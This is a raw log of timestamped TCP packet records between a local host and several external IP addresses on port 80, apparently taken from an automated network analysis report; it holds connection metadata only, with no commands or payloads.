                   Sep 14, 2024 11:11:42.409759045 CEST | 80 | 49742 | 66.81.203.10 | 192.168.2.4
                   Sep 14, 2024 11:11:42.992011070 CEST | 80 | 49742 | 66.81.203.10 | 192.168.2.4
                   Sep 14, 2024 11:11:42.992057085 CEST | 80 | 49742 | 66.81.203.10 | 192.168.2.4
                   Sep 14, 2024 11:11:42.992237091 CEST | 49742 | 80 | 192.168.2.4 | 66.81.203.10
                   Sep 14, 2024 11:11:43.909956932 CEST | 49742 | 80 | 192.168.2.4 | 66.81.203.10
                   Sep 14, 2024 11:11:44.928035975 CEST | 49743 | 80 | 192.168.2.4 | 66.81.203.10
                   Sep 14, 2024 11:11:44.934243917 CEST | 80 | 49743 | 66.81.203.10 | 192.168.2.4
                   Sep 14, 2024 11:11:44.934355021 CEST | 49743 | 80 | 192.168.2.4 | 66.81.203.10
                   Sep 14, 2024 11:11:44.943120956 CEST | 49743 | 80 | 192.168.2.4 | 66.81.203.10
                   Sep 14, 2024 11:11:44.947971106 CEST | 80 | 49743 | 66.81.203.10 | 192.168.2.4
                   Sep 14, 2024 11:11:45.517853022 CEST | 80 | 49743 | 66.81.203.10 | 192.168.2.4
                   Sep 14, 2024 11:11:45.517950058 CEST | 80 | 49743 | 66.81.203.10 | 192.168.2.4
                   Sep 14, 2024 11:11:45.518034935 CEST | 49743 | 80 | 192.168.2.4 | 66.81.203.10
                   Sep 14, 2024 11:11:46.456845999 CEST | 49743 | 80 | 192.168.2.4 | 66.81.203.10
                   Sep 14, 2024 11:11:47.475641966 CEST | 49744 | 80 | 192.168.2.4 | 66.81.203.10
                   Sep 14, 2024 11:11:47.480546951 CEST | 80 | 49744 | 66.81.203.10 | 192.168.2.4
                   Sep 14, 2024 11:11:47.480664015 CEST | 49744 | 80 | 192.168.2.4 | 66.81.203.10
                   Sep 14, 2024 11:11:47.491945982 CEST | 49744 | 80 | 192.168.2.4 | 66.81.203.10
                   Sep 14, 2024 11:11:47.496889114 CEST | 80 | 49744 | 66.81.203.10 | 192.168.2.4
                   Sep 14, 2024 11:11:47.496898890 CEST | 80 | 49744 | 66.81.203.10 | 192.168.2.4
                   Sep 14, 2024 11:11:47.496928930 CEST | 80 | 49744 | 66.81.203.10 | 192.168.2.4
                   Sep 14, 2024 11:11:47.496937037 CEST | 80 | 49744 | 66.81.203.10 | 192.168.2.4
                   Sep 14, 2024 11:11:47.496958017 CEST | 80 | 49744 | 66.81.203.10 | 192.168.2.4
                   Sep 14, 2024 11:11:47.496965885 CEST | 80 | 49744 | 66.81.203.10 | 192.168.2.4
                  Sep 14, 2024 11:11:47.497003078 CEST804974466.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:47.497010946 CEST804974466.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:47.497018099 CEST804974466.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:48.087112904 CEST804974466.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:48.128715992 CEST4974480192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:48.156624079 CEST804974466.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:48.156810999 CEST4974480192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:49.003736019 CEST4974480192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:50.022319078 CEST4974580192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:50.034684896 CEST804974566.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:50.034872055 CEST4974580192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:50.040980101 CEST4974580192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:50.045794010 CEST804974566.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:50.612376928 CEST804974566.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:50.612507105 CEST804974566.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:50.612517118 CEST804974566.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:50.612643957 CEST804974566.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:50.612929106 CEST4974580192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:50.613125086 CEST4974580192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:50.617424011 CEST4974580192.168.2.466.81.203.10
                  Sep 14, 2024 11:11:50.622173071 CEST804974566.81.203.10192.168.2.4
                  Sep 14, 2024 11:11:56.388959885 CEST4974680192.168.2.4103.42.108.46
                  Sep 14, 2024 11:11:56.394188881 CEST8049746103.42.108.46192.168.2.4
                  Sep 14, 2024 11:11:56.394294024 CEST4974680192.168.2.4103.42.108.46
                  Sep 14, 2024 11:11:56.460100889 CEST4974680192.168.2.4103.42.108.46
                  Sep 14, 2024 11:11:56.464945078 CEST8049746103.42.108.46192.168.2.4
                  Sep 14, 2024 11:11:57.284892082 CEST8049746103.42.108.46192.168.2.4
                  Sep 14, 2024 11:11:57.284979105 CEST8049746103.42.108.46192.168.2.4
                  Sep 14, 2024 11:11:57.285087109 CEST4974680192.168.2.4103.42.108.46
                  Sep 14, 2024 11:11:57.972623110 CEST4974680192.168.2.4103.42.108.46
                  Sep 14, 2024 11:11:58.991624117 CEST4974780192.168.2.4103.42.108.46
                  Sep 14, 2024 11:11:58.997800112 CEST8049747103.42.108.46192.168.2.4
                  Sep 14, 2024 11:11:58.997874022 CEST4974780192.168.2.4103.42.108.46
                  Sep 14, 2024 11:11:59.008897066 CEST4974780192.168.2.4103.42.108.46
                  Sep 14, 2024 11:11:59.015151978 CEST8049747103.42.108.46192.168.2.4
                  Sep 14, 2024 11:11:59.884313107 CEST8049747103.42.108.46192.168.2.4
                  Sep 14, 2024 11:11:59.884442091 CEST8049747103.42.108.46192.168.2.4
                  Sep 14, 2024 11:11:59.884516001 CEST4974780192.168.2.4103.42.108.46
                  Sep 14, 2024 11:12:00.519340992 CEST4974780192.168.2.4103.42.108.46
                  Sep 14, 2024 11:12:01.538364887 CEST4974880192.168.2.4103.42.108.46
                  Sep 14, 2024 11:12:01.543246031 CEST8049748103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:01.543349981 CEST4974880192.168.2.4103.42.108.46
                  Sep 14, 2024 11:12:01.554862022 CEST4974880192.168.2.4103.42.108.46
                  Sep 14, 2024 11:12:01.559861898 CEST8049748103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:01.559871912 CEST8049748103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:01.559886932 CEST8049748103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:01.559895992 CEST8049748103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:01.559906006 CEST8049748103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:01.560389042 CEST8049748103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:01.560465097 CEST8049748103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:01.560527086 CEST8049748103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:01.560539007 CEST8049748103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:02.426007986 CEST8049748103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:02.431524992 CEST4974880192.168.2.4103.42.108.46
                  Sep 14, 2024 11:12:03.066459894 CEST4974880192.168.2.4103.42.108.46
                  Sep 14, 2024 11:12:03.071434975 CEST8049748103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:04.085556030 CEST4974980192.168.2.4103.42.108.46
                  Sep 14, 2024 11:12:04.090655088 CEST8049749103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:04.090755939 CEST4974980192.168.2.4103.42.108.46
                  Sep 14, 2024 11:12:04.097100973 CEST4974980192.168.2.4103.42.108.46
                  Sep 14, 2024 11:12:04.101984024 CEST8049749103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:04.990652084 CEST8049749103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:04.990710974 CEST8049749103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:04.990793943 CEST4974980192.168.2.4103.42.108.46
                  Sep 14, 2024 11:12:04.993753910 CEST4974980192.168.2.4103.42.108.46
                  Sep 14, 2024 11:12:04.998615980 CEST8049749103.42.108.46192.168.2.4
                  Sep 14, 2024 11:12:10.642126083 CEST4975080192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:10.650418043 CEST80497503.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:10.653945923 CEST4975080192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:10.665671110 CEST4975080192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:10.675323963 CEST80497503.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:11.113064051 CEST80497503.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:11.113126040 CEST4975080192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:12.175755978 CEST4975080192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:12.180717945 CEST80497503.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:13.194293976 CEST4975180192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:13.200364113 CEST80497513.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:13.200442076 CEST4975180192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:13.210875988 CEST4975180192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:13.216779947 CEST80497513.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:14.598299026 CEST80497513.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:14.599654913 CEST4975180192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:14.722897053 CEST4975180192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:14.727866888 CEST80497513.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:15.746252060 CEST4975280192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:15.751240969 CEST80497523.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:15.751306057 CEST4975280192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:15.766053915 CEST4975280192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:15.770975113 CEST80497523.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:15.770986080 CEST80497523.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:15.771042109 CEST80497523.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:15.771056890 CEST80497523.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:15.771095037 CEST80497523.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:15.771116972 CEST80497523.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:15.771140099 CEST80497523.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:15.771147966 CEST80497523.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:15.771157980 CEST80497523.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:16.215840101 CEST80497523.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:16.217823029 CEST4975280192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:17.269359112 CEST4975280192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:17.274365902 CEST80497523.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:18.287887096 CEST4975380192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:18.292792082 CEST80497533.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:18.295659065 CEST4975380192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:18.305566072 CEST4975380192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:18.310379028 CEST80497533.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:18.771275997 CEST80497533.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:18.771373987 CEST80497533.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:18.771436930 CEST4975380192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:18.774107933 CEST4975380192.168.2.43.33.130.190
                  Sep 14, 2024 11:12:18.778907061 CEST80497533.33.130.190192.168.2.4
                  Sep 14, 2024 11:12:32.017718077 CEST4975480192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:32.023211002 CEST8049754199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:32.027772903 CEST4975480192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:32.041430950 CEST4975480192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:32.046250105 CEST8049754199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:32.485328913 CEST8049754199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:32.486071110 CEST8049754199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:32.486082077 CEST8049754199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:32.486159086 CEST4975480192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:32.486160040 CEST4975480192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:33.550649881 CEST4975480192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:34.568984985 CEST4975580192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:34.577024937 CEST8049755199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:34.577841997 CEST4975580192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:34.589665890 CEST4975580192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:34.594579935 CEST8049755199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:35.042042017 CEST8049755199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:35.042124987 CEST8049755199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:35.042135000 CEST8049755199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:35.042181969 CEST4975580192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:35.042181969 CEST4975580192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:36.097529888 CEST4975580192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:37.115900040 CEST4975680192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:37.120902061 CEST8049756199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:37.120971918 CEST4975680192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:37.130942106 CEST4975680192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:37.343719959 CEST8049756199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:37.343962908 CEST8049756199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:37.344074011 CEST8049756199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:37.344315052 CEST8049756199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:37.344327927 CEST8049756199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:37.344340086 CEST8049756199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:37.344353914 CEST8049756199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:37.344383955 CEST8049756199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:37.344394922 CEST8049756199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:37.821768999 CEST8049756199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:37.821868896 CEST8049756199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:37.821880102 CEST8049756199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:37.822272062 CEST4975680192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:38.644707918 CEST4975680192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:39.663916111 CEST4975780192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:39.668843985 CEST8049757199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:39.668914080 CEST4975780192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:39.676362038 CEST4975780192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:39.681211948 CEST8049757199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:40.145515919 CEST8049757199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:40.145533085 CEST8049757199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:40.145564079 CEST8049757199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:40.145807028 CEST4975780192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:40.151612043 CEST4975780192.168.2.4199.59.243.226
                  Sep 14, 2024 11:12:40.156810999 CEST8049757199.59.243.226192.168.2.4
                  Sep 14, 2024 11:12:45.209527969 CEST4975880192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:45.214483976 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.214555025 CEST4975880192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:45.226059914 CEST4975880192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:45.230926037 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.819773912 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.819793940 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.819804907 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.819860935 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.819856882 CEST4975880192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:45.819874048 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.819885015 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.819896936 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.819909096 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.819920063 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.819924116 CEST4975880192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:45.819931030 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.819958925 CEST4975880192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:45.819958925 CEST4975880192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:45.819993973 CEST4975880192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:45.824719906 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.824762106 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.824773073 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.824840069 CEST4975880192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:45.906585932 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.906621933 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.906657934 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.906687021 CEST8049758162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:45.906688929 CEST4975880192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:45.909465075 CEST4975880192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:46.738225937 CEST4975880192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:47.757251978 CEST4975980192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:47.762115002 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:47.762222052 CEST4975980192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:47.771934032 CEST4975980192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:47.776757956 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.348790884 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.348839998 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.348855019 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.348875999 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.348891020 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.348903894 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.348917961 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.348922968 CEST4975980192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:48.348932028 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.348948002 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.348963022 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.348963022 CEST4975980192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:48.348985910 CEST4975980192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:48.349023104 CEST4975980192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:48.353954077 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.354238033 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.354252100 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.354288101 CEST4975980192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:48.394413948 CEST4975980192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:48.433134079 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.433160067 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.433176041 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.433219910 CEST4975980192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:48.433309078 CEST8049759162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:48.433357000 CEST4975980192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:49.285217047 CEST4975980192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:50.305799007 CEST4976080192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:50.310703039 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.311050892 CEST4976080192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:50.321208954 CEST4976080192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:50.326256990 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.326267004 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.326273918 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.326282024 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.326311111 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.326319933 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.326327085 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.326334953 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.326342106 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.939414978 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.939429998 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.939439058 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.939448118 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.939457893 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.939469099 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.939479113 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.939496040 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.939506054 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.939526081 CEST4976080192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:50.939589977 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.939598083 CEST4976080192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:50.939598083 CEST4976080192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:50.939632893 CEST4976080192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:50.944468021 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.944478035 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.944485903 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.944493055 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:50.944644928 CEST4976080192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:50.944645882 CEST4976080192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:51.029772997 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:51.029807091 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:51.029819012 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:51.029984951 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:51.030011892 CEST4976080192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:51.030102968 CEST4976080192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:51.832070112 CEST4976080192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:52.851737022 CEST4976180192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:52.856689930 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:52.856767893 CEST4976180192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:52.866863966 CEST4976180192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:52.873395920 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.457520008 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.457551956 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.457582951 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.457593918 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.457607985 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.457606077 CEST4976180192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:53.457627058 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.457643032 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.457653999 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.457653046 CEST4976180192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:53.457663059 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.457674980 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.457711935 CEST4976180192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:53.457741976 CEST4976180192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:53.462788105 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.462836981 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.462846994 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.462860107 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.462877035 CEST4976180192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:53.462940931 CEST4976180192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:53.545783997 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.545835018 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.545844078 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.545854092 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.545919895 CEST4976180192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:53.545958996 CEST4976180192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:53.546057940 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.546104908 CEST4976180192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:53.550491095 CEST4976180192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:53.555361032 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:13:06.661948919 CEST4976280192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:06.666775942 CEST804976284.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:06.667754889 CEST4976280192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:06.679667950 CEST4976280192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:06.684549093 CEST804976284.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:07.153400898 CEST804976284.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:07.153461933 CEST4976280192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:08.191371918 CEST4976280192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:08.196346998 CEST804976284.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:09.210674047 CEST4976380192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:09.215630054 CEST804976384.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:09.215706110 CEST4976380192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:09.228080988 CEST4976380192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:09.232949018 CEST804976384.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:09.671035051 CEST804976384.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:09.671093941 CEST4976380192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:10.738254070 CEST4976380192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:10.743199110 CEST804976384.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:11.756777048 CEST4976480192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:11.763004065 CEST804976484.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:11.763081074 CEST4976480192.168.2.484.32.84.32
